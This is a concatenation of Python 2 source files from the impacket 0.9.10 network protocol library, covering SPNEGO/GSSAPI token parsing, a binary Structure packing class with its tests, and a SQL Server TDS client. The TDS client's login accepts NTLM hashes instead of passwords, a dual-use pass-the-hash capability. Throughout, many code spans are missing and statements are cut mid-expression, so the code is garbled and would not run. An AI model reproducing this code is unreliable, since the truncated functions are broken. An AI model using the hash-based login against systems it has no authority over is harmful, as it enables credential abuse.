ASN1_SEQUENCE = 0x30 ASN1_SEQUENCE = 0x30 ASN1_AID = 0x60 ASN1_OID = 0x06 ASN1_OCTET_STRING = 0x04 ASN1_MECH_TYPE = 0xa0 ASN1_MECH_TOKEN = 0xa2 ASN1_SUPPORTED_MECH = 0xa1 ASN1_RESPONSE_TOKEN = 0xa2 ASN1_ENUMERATED = 0x0a MechTypes = { '+\x06\x01\x04\x01\x827\x02\x02\x1e': 'SNMPv2-SMI::enterprises.311.2.2.30', '+\x06\x01\x04\x01\x827\x02\x02\n': 'NTLMSSP - Microsoft NTLM Security Support Provider', '*\x86H\x82\xf7\x12\x01\x02\x02': 'MS KRB5 - Microsoft Kerberos 5', '*\x86H\x86\xf7\x12\x01\x02\x02': 'KRB5 - Kerberos 5', '*\x86H\x86\xf7\x12\x01\x02\x02\x03': 'KRB5 - Kerberos 5 - User to User' } TypesMech = dict((v,k) for k, v in MechTypes.iteritems()) def asn1encode(data = ''): #res = asn1.SEQUENCE(str).encode() #import binascii #print '\nalex asn1encode str: %s\n' % binascii.hexlify(str) if len(data) >= 0 and len(data) <= 0x7F: res = pack('B', len(data)) + data elif len(data) >= 0x80 and len(data) <= 0xFF: res = pack('BB', 0x81, len(data)) + data elif len(data) >= 0x100 and len(data) <= 0xFFFF: res = pack('!BH', 0x82, len(data)) + data elif len(data) >= 0x10000 and len(data) <= 0xffffff: res = pack('!BBH', 0x83, len(data) >> 16, len(data) & 0xFFFF) + data elif len(data) >= 0x1000000 and len(data) <= 0xffffffff: res = pack('!BL', 0x84, len(data)) + data else: raise Exception('Error in asn1encode') return str(res) def asn1decode(data = ''): len1 = unpack('B', data[:1])[0] data = data[1:] if len1 == 0x81: pad = calcsize('B') len2 = unpack('B',data[:pad])[0] data = data[pad:] ans = data[:len2] elif len1 == 0x82: pad = calcsize('H') len2 = unpack('!H', data[:pad])[0] data = data[pad:] ans = data[:len2] elif len1 == 0x83: pad = calcsize('B') + calcsize('!H') len2, len3 = unpack('!BH', data[:pad]) data = data[pad:] ans = data[:len2 << 16 + len3] elif len1 == 0x84: pad = calcsize('!L') len2 = unpack('!L', data[:pad])[0] data = data[pad:] ans = data[:len2] # 1 byte length, string <= 0x7F else: pad = 0 ans = data[:len1] return ans, len(ans)+pad+1 class GSSAPI(): # Generic GSSAPI Header Format def __init__(self, data = None): self.fields = {} self['UUID'] = GSS_API_SPNEGO_UUID if data: self.fromString(data) pass def __setitem__(self,key,value): self.fields[key] = value def __getitem__(self, key): return self.fields[key] def __delitem__(self, key): del self.fields[key] def __len__(self): return len(self.getData()) def __str__(self): return len(self.getData()) def fromString(self, data = None): # Manual parse of the GSSAPI Header Format # It should be something like # AID = 0x60 TAG, BER Length # OID = 0x06 TAG # GSSAPI OID # UUID data (BER Encoded) # Payload next_byte = unpack('B',data[:1])[0] if next_byte != ASN1_AID: raise Exception('Unknown AID=%x' % next_byte) data = data[1:] decode_data, total_bytes = asn1decode(data) # Now we should have a OID tag next_byte = unpack('B',decode_data[:1])[0] if next_byte != ASN1_OID: raise Exception('OID tag not found %x' % next_byte) decode_data = decode_data[1:] # Now the OID contents, should be SPNEGO UUID uuid, total_bytes = asn1decode(decode_data) self['OID'] = uuid # the rest should be the data self['Payload'] = decode_data[total_bytes:] #pass def dump(self): for i in self.fields.keys(): print "%s: {%r}" % (i,self[i]) def getData(self): ans = pack('B',ASN1_AID) ans += asn1encode( pack('B',ASN1_OID) + asn1encode(self['UUID']) + self['Payload'] ) return ans class SPNEGO_NegTokenResp(): # http://tools.ietf.org/html/rfc4178#page-9 # NegTokenResp ::= SEQUENCE { # negState [0] ENUMERATED { # accept-completed (0), # accept-incomplete (1), # reject (2), # request-mic (3) # } OPTIONAL, # -- REQUIRED in the first reply from the target # supportedMech [1] MechType OPTIONAL, # -- present only in the first reply from the target # responseToken [2] OCTET STRING OPTIONAL, # mechListMIC [3] OCTET STRING OPTIONAL, # ... # } # This structure is not prepended by a GSS generic header! SPNEGO_NEG_TOKEN_RESP = 0xa1 SPNEGO_NEG_TOKEN_TARG = 0xa0 def __init__(self, data = None): self.fields = {} if data: self.fromString(data) pass def __setitem__(self,key,value): self.fields[key] = value def __getitem__(self, key): return self.fields[key] def __delitem__(self, key): del self.fields[key] def __len__(self): return len(self.getData()) def __str__(self): return len(self.getData()) def fromString(self, data = 0): payload = data next_byte = unpack('B', payload[:1])[0] if next_byte != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP: raise Exception('NegTokenResp not found %x' % next_byte) payload = payload[1:] decode_data, total_bytes = asn1decode(payload) next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_SEQUENCE: raise Exception('SEQUENCE tag not found %x' % next_byte) decode_data = decode_data[1:] decode_data, total_bytes = asn1decode(decode_data) next_byte = unpack('B',decode_data[:1])[0] if next_byte != ASN1_MECH_TYPE: # MechType not found, could be an AUTH answer if next_byte != ASN1_RESPONSE_TOKEN: raise Exception('MechType/ResponseToken tag not found %x' % next_byte) else: decode_data2 = decode_data[1:] decode_data2, total_bytes = asn1decode(decode_data2) next_byte = unpack('B', decode_data2[:1])[0] if next_byte != ASN1_ENUMERATED: raise Exception('Enumerated tag not found %x' % next_byte) decode_data2 = decode_data2[1:] item, total_bytes2 = asn1decode(decode_data) self['NegResult'] = item decode_data = decode_data[1:] decode_data = decode_data[total_bytes:] # Do we have more data? if len(decode_data) == 0: return next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_SUPPORTED_MECH: if next_byte != ASN1_RESPONSE_TOKEN: raise Exception('Supported Mech/ResponseToken tag not found %x' % next_byte) else: decode_data2 = decode_data[1:] decode_data2, total_bytes = asn1decode(decode_data2) next_byte = unpack('B', decode_data2[:1])[0] if next_byte != ASN1_OID: raise Exception('OID tag not found %x' % next_byte) decode_data2 = decode_data2[1:] item, total_bytes2 = asn1decode(decode_data2) self['SuportedMech'] = item decode_data = decode_data[1:] decode_data = decode_data[total_bytes:] next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_RESPONSE_TOKEN: raise Exception('Response token tag not found %x' % next_byte) decode_data = decode_data[1:] decode_data, total_bytes = asn1decode(decode_data) next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_OCTET_STRING: raise Exception('Octet string token tag not found %x' % next_byte) decode_data = decode_data[1:] decode_data, total_bytes = asn1decode(decode_data) self['ResponseToken'] = decode_data def dump(self): for i in self.fields.keys(): print "%s: {%r}" % (i,self[i]) def getData(self): ans = pack('B',SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP) if self.fields.has_key('NegResult') and self.fields.has_key('SupportedMech'): # Server resp ans += asn1encode( pack('B', ASN1_SEQUENCE) + asn1encode( pack('B',SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_TARG) + asn1encode( pack('B',ASN1_ENUMERATED) + asn1encode( self['NegResult'] )) + pack('B',ASN1_SUPPORTED_MECH) + asn1encode( pack('B',ASN1_OID) + asn1encode(self['SupportedMech'])) + pack('B',ASN1_RESPONSE_TOKEN ) + asn1encode( pack('B', ASN1_OCTET_STRING) + asn1encode(self['ResponseToken'])))) elif self.fields.has_key('NegResult'): # Server resp ans += asn1encode( pack('B', ASN1_SEQUENCE) + asn1encode( pack('B', SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_TARG) + asn1encode( pack('B',ASN1_ENUMERATED) + asn1encode( self['NegResult'] )))) else: # Client resp ans += asn1encode( pack('B', ASN1_SEQUENCE) + asn1encode( pack('B', ASN1_RESPONSE_TOKEN) + asn1encode( pack('B', ASN1_OCTET_STRING) + asn1encode(self['ResponseToken'])))) return ans class SPNEGO_NegTokenInit(GSSAPI): # http://tools.ietf.org/html/rfc4178#page-8 # NegTokeInit :: = SEQUENCE { # mechTypes [0] MechTypeList, # reqFlags [1] ContextFlags OPTIONAL, # mechToken [2] OCTET STRING OPTIONAL, # mechListMIC [3] OCTET STRING OPTIONAL, # } SPNEGO_NEG_TOKEN_INIT = 0xa0 def fromString(self, data = 0): GSSAPI.fromString(self, data) payload = self['Payload'] next_byte = unpack('B', payload[:1])[0] if next_byte != SPNEGO_NegTokenInit.SPNEGO_NEG_TOKEN_INIT: raise Exception('NegTokenInit not found %x' % next_byte) payload = payload[1:] decode_data, total_bytes = asn1decode(payload) # Now we should have a SEQUENCE Tag next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_SEQUENCE: raise Exception('SEQUENCE tag not found %x' % next_byte) decode_data = decode_data[1:] decode_data, total_bytes2 = asn1decode(decode_data) next_byte = unpack('B',decode_data[:1])[0] if next_byte != ASN1_MECH_TYPE: raise Exception('MechType tag not found %x' % next_byte) decode_data = decode_data[1:] remaining_data = decode_data decode_data, total_bytes3 = asn1decode(decode_data) next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_SEQUENCE: raise Exception('SEQUENCE tag not found %x' % next_byte) decode_data = decode_data[1:] decode_data, total_bytes4 = asn1decode(decode_data) # And finally we should have the MechTypes self['MechTypes'] = [] i = 1 while decode_data: next_byte = unpack('B', decode_data[:1])[0] if next_byte != ASN1_OID: # Not a valid OID, there must be something else we won't unpack break decode_data = decode_data[1:] item, total_bytes = asn1decode(decode_data) self['MechTypes'].append(item) decode_data = decode_data[total_bytes:] # Do we have MechTokens as well? decode_data = remaining_data[total_bytes3:] if len(decode_data) > 0: next_byte = unpack('B', decode_data[:1])[0] if next_byte == ASN1_MECH_TOKEN: # We have tokens in here! decode_data = decode_data[1:] decode_data, total_bytes = asn1decode(decode_data) next_byte = unpack('B', decode_data[:1])[0] if next_byte == ASN1_OCTET_STRING: decode_data = decode_data[1:] decode_data, total_bytes = asn1decode(decode_data) self['MechToken'] = decode_data def getData(self): mechTypes = '' for i in self['MechTypes']: mechTypes += pack('B', ASN1_OID) mechTypes += asn1encode(i) mechToken = '' # Do we have tokens to send? if self.fields.has_key('MechToken'): mechToken = pack('B', ASN1_MECH_TOKEN) + asn1encode( pack('B', ASN1_OCTET_STRING) + asn1encode( self['MechToken'])) ans = pack('B',SPNEGO_NegTokenInit.SPNEGO_NEG_TOKEN_INIT) ans += asn1encode( pack('B', ASN1_SEQUENCE) + asn1encode( pack('B', ASN1_MECH_TYPE) + asn1encode( pack('B', ASN1_SEQUENCE) + asn1encode(mechTypes)) + mechToken )) self['Payload'] = ans return GSSAPI.getData(self) impacket-0.9.10/impacket/structure.py0000600000076500000240000006017012141750575017664 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: structure.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # from struct import pack, unpack, calcsize class Structure: """ sublcasses can define commonHdr and/or structure. each of them is an tuple of either two: (fieldName, format) or three: (fieldName, ':', class) fields. [it can't be a dictionary, because order is important] where format specifies how the data in the field will be converted to/from bytes (string) class is the class to use when unpacking ':' fields. each field can only contain one value (or an array of values for *) i.e. struct.pack('Hl',1,2) is valid, but format specifier 'Hl' is not (you must use 2 dfferent fields) format specifiers: specifiers from module pack can be used with the same format see struct.__doc__ (pack/unpack is finally called) x [padding byte] c [character] b [signed byte] B [unsigned byte] h [signed short] H [unsigned short] l [signed long] L [unsigned long] i [signed integer] I [unsigned integer] q [signed long long (quad)] Q [unsigned long ong (quad)] s [string (array of chars), must be preceded with length in format specifier, padded with zeros] p [pascal string (includes byte count), must be preceded with length in format specifier, padded with zeros] f [float] d [double] = [native byte ordering, size and alignment] @ [native byte ordering, standard size and alignment] ! [network byte ordering] < [little endian] > [big endian] usual printf like specifiers can be used (if started with %) [not recommeneded, there is no why to unpack this] %08x will output an 8 bytes hex %s will output a string %s\x00 will output a NUL terminated string %d%d will output 2 decimal digits (against the very same specification of Structure) ... some additional format specifiers: : just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned) z same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator) [asciiz string] u same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string] w DCE-RPC/NDR string (it's a macro for [ ' 2: dataClassOrCode = field[2] try: self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) except Exception,e: e.args += ("When unpacking field '%s | %s | %r[:%d]'" % (field[0], field[1], data, size),) raise size = self.calcPackSize(field[1], self[field[0]], field[0]) if self.alignment and size % self.alignment: size += self.alignment - (size % self.alignment) data = data[size:] return self def __setitem__(self, key, value): self.fields[key] = value self.data = None # force recompute def __getitem__(self, key): return self.fields[key] def __delitem__(self, key): del self.fields[key] def __str__(self): return self.getData() def __len__(self): # XXX: improve return len(self.getData()) def pack(self, format, data, field = None): if self.debug: print " pack( %s | %r | %s)" % (format, data, field) if field: addressField = self.findAddressFieldFor(field) if (addressField is not None) and (data is None): return '' # void specifier if format[:1] == '_': return '' # quote specifier if format[:1] == "'" or format[:1] == '"': return format[1:] # code specifier two = format.split('=') if len(two) >= 2: try: return self.pack(two[0], data) except: fields = {'self':self} fields.update(self.fields) return self.pack(two[0], eval(two[1], {}, fields)) # address specifier two = format.split('&') if len(two) == 2: try: return self.pack(two[0], data) except: if (self.fields.has_key(two[1])) and (self[two[1]] is not None): return self.pack(two[0], id(self[two[1]]) & ((1<<(calcsize(two[0])*8))-1) ) else: return self.pack(two[0], 0) # length specifier two = format.split('-') if len(two) == 2: try: return self.pack(two[0],data) except: return self.pack(two[0], self.calcPackFieldSize(two[1])) # array specifier two = format.split('*') if len(two) == 2: answer = '' for each in data: answer += self.pack(two[1], each) if two[0]: if two[0].isdigit(): if int(two[0]) != len(data): raise Exception, "Array field has a constant size, and it doesn't match the actual value" else: return self.pack(two[0], len(data))+answer return answer # "printf" string specifier if format[:1] == '%': # format string like specifier return format % data # asciiz specifier if format[:1] == 'z': return str(data)+'\0' # unicode specifier if format[:1] == 'u': return str(data)+'\0\0' + (len(data) & 1 and '\0' or '') # DCE-RPC/NDR string specifier if format[:1] == 'w': if len(data) == 0: data = '\0\0' elif len(data) % 2: data += '\0' l = pack('= 2: return self.unpack(two[0],data) # length specifier two = format.split('-') if len(two) == 2: return self.unpack(two[0],data) # array specifier two = format.split('*') if len(two) == 2: answer = [] sofar = 0 if two[0].isdigit(): number = int(two[0]) elif two[0]: sofar += self.calcUnpackSize(two[0], data) number = self.unpack(two[0], data[:sofar]) else: number = -1 while number and sofar < len(data): nsofar = sofar + self.calcUnpackSize(two[1],data[sofar:]) answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode)) number -= 1 sofar = nsofar return answer # "printf" string specifier if format[:1] == '%': # format string like specifier return format % data # asciiz specifier if format == 'z': if data[-1] != '\x00': raise Exception, ("%s 'z' field is not NUL terminated: %r" % (field, data)) return data[:-1] # remove trailing NUL # unicode specifier if format == 'u': if data[-2:] != '\x00\x00': raise Exception, ("%s 'u' field is not NUL-NUL terminated: %r" % (field, data)) return data[:-2] # remove trailing NUL # DCE-RPC/NDR string specifier if format == 'w': l = unpack('= 2: return self.calcPackSize(two[0], data) # length specifier two = format.split('-') if len(two) == 2: return self.calcPackSize(two[0], data) # array specifier two = format.split('*') if len(two) == 2: answer = 0 if two[0].isdigit(): if int(two[0]) != len(data): raise Exception, "Array field has a constant size, and it doesn't match the actual value" elif two[0]: answer += self.calcPackSize(two[0], len(data)) for each in data: answer += self.calcPackSize(two[1], each) return answer # "printf" string specifier if format[:1] == '%': # format string like specifier return len(format % data) # asciiz specifier if format[:1] == 'z': return len(data)+1 # asciiz specifier if format[:1] == 'u': l = len(data) return l + (l & 1 and 3 or 2) # DCE-RPC/NDR string specifier if format[:1] == 'w': l = len(data) return 12+l+l % 2 # literal specifier if format[:1] == ':': return len(data) # struct like specifier return calcsize(format) def calcUnpackSize(self, format, data, field = None): if self.debug: print " calcUnpackSize( %s | %s | %r)" % (field, format, data) # void specifier if format[:1] == '_': return 0 addressField = self.findAddressFieldFor(field) if addressField is not None: if not self[addressField]: return 0 try: lengthField = self.findLengthFieldFor(field) return self[lengthField] except: pass # XXX: Try to match to actual values, raise if no match # quote specifier if format[:1] == "'" or format[:1] == '"': return len(format)-1 # address specifier two = format.split('&') if len(two) == 2: return self.calcUnpackSize(two[0], data) # code specifier two = format.split('=') if len(two) >= 2: return self.calcUnpackSize(two[0], data) # length specifier two = format.split('-') if len(two) == 2: return self.calcUnpackSize(two[0], data) # array specifier two = format.split('*') if len(two) == 2: answer = 0 if two[0]: if two[0].isdigit(): number = int(two[0]) else: answer += self.calcUnpackSize(two[0], data) number = self.unpack(two[0], data[:answer]) while number: number -= 1 answer += self.calcUnpackSize(two[1], data[answer:]) else: while answer < len(data): answer += self.calcUnpackSize(two[1], data[answer:]) return answer # "printf" string specifier if format[:1] == '%': raise Exception, "Can't guess the size of a printf like specifier for unpacking" # asciiz specifier if format[:1] == 'z': return data.index('\x00')+1 # asciiz specifier if format[:1] == 'u': l = data.index('\x00\x00') return l + (l & 1 and 3 or 2) # DCE-RPC/NDR string specifier if format[:1] == 'w': l = unpack('L'), ('code1','>L=len(arr1)*2+0x1000'), ) def populate(self, a): a['default'] = 'hola' a['int1'] = 0x3131 a['int3'] = 0x45444342 a['z1'] = 'hola' a['u1'] = 'hola'.encode('utf_16_le') a[':1'] = ':1234:' a['arr1'] = (0x12341234,0x88990077,0x41414141) # a['len1'] = 0x42424242 class _Test_fixedLength(_Test_simple): def populate(self, a): _Test_simple.populate(self, a) a['len1'] = 0x42424242 class _Test_simple_aligned4(_Test_simple): alignment = 4 class _Test_nested(_StructureTest): class theClass(Structure): class _Inner(Structure): structure = (('data', 'z'),) structure = ( ('nest1', ':', _Inner), ('nest2', ':', _Inner), ('int', '> 8)'), ('pad', '_','((iv >>2) & 0x3F)'), ('keyid', '_','( iv & 0x03 )'), ('dataLen', '_-data', 'len(inputDataLeft)-4'), ('data',':'), ('icv','>L'), ) def populate(self, a): a['init_vector']=0x01020304 #a['pad']=int('01010101',2) a['pad']=int('010101',2) a['keyid']=0x07 a['data']="\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9" a['icv'] = 0x05060708 #a['iv'] = 0x01020304 if __name__ == '__main__': _Test_simple().run() try: _Test_fixedLength().run() except: print "cannot repack because length is bogus" _Test_simple_aligned4().run() _Test_nested().run() _Test_Optional().run() _Test_Optional_sparse().run() _Test_AsciiZArray().run() _Test_UnpackCode().run() _Test_AAA().run() impacket-0.9.10/impacket/tds.py0000600000076500000240000012263112141750575016417 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: tds.py 632 2012-07-26 22:18:33Z bethus@gmail.com $ # # Description: [MS-TDS] & [MC-SQLR] implementation. # # ToDo: # [ ] Add all the tokens left # [ ] parseRow should be rewritten and add support for all the SQL types in a # good way. Right now it just supports a few types. # [ ] printRows is crappy, just an easy way to print the rows. It should be # rewritten to output like a normal SQL client # # Author: # Alberto Solino (beto@coresecurity.com) # from impacket import ntlm, uuid from impacket.structure import Structure import random import string import struct import socket, select import random import binascii import math import datetime # MC-SQLR Constants and Structures SQLR_PORT = 1434 SQLR_CLNT_BCAST_EX = 0x02 SQLR_CLNT_UCAST_EX = 0x03 SQLR_CLNT_UCAST_INST= 0x04 SQLR_CLNT_UCAST_DAC = 0x0f class SQLR(Structure): commonHdr = ( ('OpCode','B'), ) class SQLR_UCAST_INST(SQLR): structure = ( ('Instance',':') ) def __init__(self, data = None): SQLR.__init__(self,data) if data is not None: self['OpCode'] = SQLR_CLNT_UCAST_INST class SQLR_UCAST_DAC(SQLR): structure = ( ('Protocol', 'B=1'), ('Instance', ':'), ) def __init__(self, data = None): SQLR.__init__(self,data) if data is not None: self['OpCode'] = SQLR_CLNT_UCAST_DAC class SQLR_Response(SQLR): structure = ( ('Size','H=8+len(Data)'), ('SPID','>H=0'), ('PacketID','B=0'), ('VersionOffset','>H'), ('VersionLength','>H=len(self["Version"])'), ('EncryptionToken','>B=0x1'), ('EncryptionOffset','>H'), ('EncryptionLength','>H=1'), ('InstanceToken','>B=2'), ('InstanceOffset','>H'), ('InstanceLength','>H=len(self["Instance"])'), ('ThreadIDToken','>B=3'), ('ThreadIDOffset','>H'), ('ThreadIDLength','>H=4'), ('EndToken','>B=0xff'), ('_Version','_-Version','self["VersionLength"]'), ('Version',':'), ('Encryption','B'), ('_Instance','_-Instance','self["InstanceLength"]-1'), ('Instance',':'), ('ThreadID',':'), ) def __str__(self): self['VersionOffset']=21 self['EncryptionOffset']=self['VersionOffset'] + len(self['Version']) self['InstanceOffset']=self['EncryptionOffset'] + 1 self['ThreadIDOffset']=self['InstanceOffset'] + len(self['Instance']) return Structure.__str__(self) class TDS_LOGIN(Structure): structure = ( ('Length','L=0x71'), ('PacketSize','>L=32766'), ('ClientProgVer','>L=7'), ('ClientPID','> 4) ^ 0xa5) , password)) def connect(self): af, socktype, proto, canonname, sa = socket.getaddrinfo(self.server, self.port, 0, socket.SOCK_STREAM)[0] sock = socket.socket(af, socktype, proto) sock.connect(sa) self.socket = sock return sock def disconnect(self): return self.socket.close() def setPacketSize(self, packetSize): self.packetSize = packetSize def getPacketSize(self): return self.packetSize def sendTDS(self, packetType, data, packetID = 1): if (len(data)-8) > self.packetSize: remaining = data[self.packetSize-8:] tds = TDSPacket() tds['Type'] = packetType tds['Status'] = TDS_STATUS_NORMAL tds['PacketID'] = packetID tds['Data'] = data[:self.packetSize-8] self.socket.sendall(str(tds)) while len(remaining) > (self.packetSize-8): packetID += 1 tds['PacketID'] = packetID tds['Data'] = remaining[:self.packetSize-8] self.socket.sendall(str(tds)) remaining = remaining[self.packetSize-8:] data = remaining packetID+=1 tds = TDSPacket() tds['Type'] = packetType tds['Status'] = TDS_STATUS_EOM tds['PacketID'] = packetID tds['Data'] = data self.socket.sendall(str(tds)) def recvTDS(self, packetSize = None): # Do reassembly here if packetSize is None: packetSize = self.packetSize packet = TDSPacket(self.socket.recv(packetSize)) status = packet['Status'] packetLen = packet['Length']-8 while packetLen > len(packet['Data']): data = self.socket.recv(packetSize) packet['Data'] += data remaining = None if packetLen < len(packet['Data']): remaining = packet['Data'][packetLen:] packet['Data'] = packet['Data'][:packetLen] #print "REMAINING ", #if remaining is None: # print None #else: # print len(remaining) while status != TDS_STATUS_EOM: if remaining is not None: tmpPacket = TDSPacket(remaining) remaining = None else: tmpPacket = TDSPacket(self.socket.recv(packetSize)) packetLen = tmpPacket['Length'] - 8 while packetLen > len(tmpPacket['Data']): data = self.socket.recv(packetSize) tmpPacket['Data'] += data remaining = None if packetLen < len(tmpPacket['Data']): remaining = tmpPacket['Data'][packetLen:] tmpPacket['Data'] = tmpPacket['Data'][:packetLen] status = tmpPacket['Status'] packet['Data'] += tmpPacket['Data'] packet['Length'] += tmpPacket['Length'] - 8 #print packet['Length'] return packet def login(self, database, username, password='', domain='', hashes = None, useWindowsAuth = False): if hashes is not None: lmhash, nthash = hashes.split(':') lmhash = binascii.a2b_hex(lmhash) nthash = binascii.a2b_hex(nthash) else: lmhash = '' nthash = '' resp = self.preLogin() # Test this! if resp['Encryption'] != TDS_ENCRYPT_NOT_SUP: print "Encryption not supported" login = TDS_LOGIN() login['HostName'] = (''.join([random.choice(string.letters) for i in range(8)])).encode('utf-16le') login['AppName'] = (''.join([random.choice(string.letters) for i in range(8)])).encode('utf-16le') login['ServerName'] = self.server.encode('utf-16le') login['CltIntName'] = login['AppName'] login['ClientPID'] = random.randint(0,1024) if database is not None: login['Database'] = database.encode('utf-16le') login['OptionFlags2'] = TDS_INIT_LANG_FATAL | TDS_ODBC_ON if useWindowsAuth is True: login['OptionFlags2'] |= TDS_INTEGRATED_SECURITY_ON # NTLMSSP Negotiate auth = ntlm.getNTLMSSPType1('WORKSTATION','') login['SSPI'] = str(auth) else: login['UserName'] = username.encode('utf-16le') login['Password'] = self.encryptPassword(password.encode('utf-16le')) login['SSPI'] = '' login['Length'] = len(str(login)) self.sendTDS(TDS_LOGIN7, str(login)) # Send the NTLMSSP Negotiate or SQL Auth Packet tds = self.recvTDS() if useWindowsAuth is True: serverChallenge = tds['Data'][3:] # Generate the NTLM ChallengeResponse AUTH type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, serverChallenge, username, password, domain, lmhash, nthash) self.sendTDS(TDS_SSPI, str(type3)) tds = self.recvTDS() self.replies = self.parseReply(tds['Data']) if self.replies.has_key(TDS_LOGINACK_TOKEN): return True else: return False def processColMeta(self): for col in self.colMeta: if col['Type'] in [TDS_NVARCHARTYPE, TDS_NCHARTYPE, TDS_NTEXTTYPE]: col['Length'] = col['TypeData']/2 fmt = '%%-%ds' elif col['Type'] in [TDS_GUIDTYPE]: col['Length'] = 36 fmt = '%%%ds' elif col['Type'] in [TDS_DECIMALNTYPE,TDS_NUMERICNTYPE]: col['Length'] = ord(col['TypeData'][0]) fmt = '%%%ds' elif col['Type'] in [TDS_DATETIMNTYPE]: col['Length'] = 19 fmt = '%%-%ds' elif col['Type'] in [TDS_INT4TYPE, TDS_INTNTYPE]: col['Length'] = 11 fmt = '%%%ds' elif col['Type'] in [TDS_FLTNTYPE, TDS_MONEYNTYPE]: col['Length'] = 25 fmt = '%%%ds' elif col['Type'] in [TDS_BITNTYPE, TDS_BIGCHARTYPE]: col['Length'] = col['TypeData'] fmt = '%%%ds' elif col['Type'] in [TDS_BIGBINARYTYPE, TDS_BIGVARBINTYPE]: col['Length'] = col['TypeData'] * 2 fmt = '%%%ds' elif col['Type'] in [TDS_TEXTTYPE, TDS_BIGVARCHRTYPE]: col['Length'] = col['TypeData'] fmt = '%%-%ds' else: col['Length'] = 10 fmt = '%%%ds' if len(col['Name']) > col['Length']: col['Length'] = len(col['Name']) elif col['Length'] > self.MAX_COL_LEN: col['Length'] = self.MAX_COL_LEN col['Format'] = fmt % col['Length'] def printColumnsHeader(self): if len(self.colMeta) == 0: return for col in self.colMeta: print col['Format'] % col['Name'] + self.COL_SEPARATOR, print '' for col in self.colMeta: print '-'*col['Length'] + self.COL_SEPARATOR, print '' def printRows(self): if self.lastError is True: return self.processColMeta() self.printColumnsHeader() for row in self.rows: for col in self.colMeta: print col['Format'] % row[col['Name']] + self.COL_SEPARATOR, print '' def printReplies(self): for keys in self.replies.keys(): for i, key in enumerate(self.replies[keys]): if key['TokenType'] == TDS_ERROR_TOKEN: print "[!] ERROR(%s): Line %d: %s" % (key['ServerName'].decode('utf-16le'), key['LineNumber'], key['MsgText'].decode('utf-16le')) self.lastError = True elif key['TokenType'] == TDS_INFO_TOKEN: print "[*] INFO(%s): Line %d: %s" % (key['ServerName'].decode('utf-16le'), key['LineNumber'], key['MsgText'].decode('utf-16le')) elif key['TokenType'] == TDS_LOGINACK_TOKEN: print "[*] ACK: Result: %s - %s (%d%d %d%d) " % (key['Interface'], key['ProgName'].decode('utf-16le'), key['MajorVer'], key['MinorVer'], key['BuildNumHi'], key['BuildNumLow']) elif key['TokenType'] == TDS_ENVCHANGE_TOKEN: if key['Type'] in (TDS_ENVCHANGE_DATABASE, TDS_ENVCHANGE_LANGUAGE, TDS_ENVCHANGE_CHARSET, TDS_ENVCHANGE_PACKETSIZE): record = TDS_ENVCHANGE_VARCHAR(key['Data']) if record['OldValue'] == '': record['OldValue'] = 'None'.encode('utf-16le') elif record['NewValue'] == '': record['NewValue'] = 'None'.encode('utf-16le') if key['Type'] == TDS_ENVCHANGE_DATABASE: type = 'DATABASE' elif key['Type'] == TDS_ENVCHANGE_LANGUAGE: type = 'LANGUAGE' elif key['Type'] == TDS_ENVCHANGE_CHARSET: type = 'CHARSET' elif key['Type'] == TDS_ENVCHANGE_PACKETSIZE: type = 'PACKETSIZE' else: type = "%d" % key['Type'] print "[*] ENVCHANGE(%s): Old Value: %s, New Value: %s" % (type,record['OldValue'].decode('utf-16le'), record['NewValue'].decode('utf-16le')) def parseRow(self,token): # TODO: This REALLY needs to be improved. Right now we don't support correctly all the data types # help would be appreciated ;) if len(token) == 1: return 0 row = {} origDataLen = len(token['Data']) data = token['Data'] for col in self.colMeta: type = col['Type'] if (type == TDS_NVARCHARTYPE) |\ (type == TDS_NCHARTYPE): #print "NVAR 0x%x" % type charLen = struct.unpack(' 0: uu = data[:uuidLen] value = uuid.bin_to_string(uu) data = data[uuidLen:] else: value = 'NULL' elif (type == TDS_NTEXTTYPE) |\ (type == TDS_IMAGETYPE) : # Skip the pointer data charLen = ord(data[0]) if charLen == 0: value = 'NULL' data = data[1:] else: data = data[1+charLen+8:] charLen = struct.unpack(' 0: value = struct.unpack(fmt,data[:valueSize])[0] data = data[valueSize:] else: value = 'NULL' elif type == TDS_MONEYNTYPE: valueSize = ord(data[:1]) if valueSize == 4: fmt = ' 0: value = struct.unpack(fmt,data[:valueSize])[0] if valueSize == 4: value = float(value) / math.pow(10,4) else: value = float(value >> 32) / math.pow(10,4) data = data[valueSize:] else: value = 'NULL' elif type == TDS_BIGCHARTYPE: #print "BIGC" charLen = struct.unpack(' 0: dateBytes = data[:valueSize] dateValue = struct.unpack(' 0: isPositiveSign = ord(value[0]) if (valueLen-1) == 2: fmt = ' 0: if valueSize == 1: value = ord(data[:valueSize]) else: value = data[:valueSize] else: value = 'NULL' data = data[valueSize:] elif (type == TDS_INTNTYPE): valueSize = ord(data[:1]) if valueSize == 1: fmt = ' 0: value = struct.unpack(fmt,data[:valueSize])[0] data = data[valueSize:] else: value = 'NULL' elif (type == TDS_SSVARIANTTYPE): print "ParseRow: SQL Variant type not yet supported :(" raise else: print "ParseROW: Unsupported data type: 0%x" % type raise row[col['Name']] = value self.rows.append(row) return (origDataLen - len(data)) def parseColMetaData(self, token): # 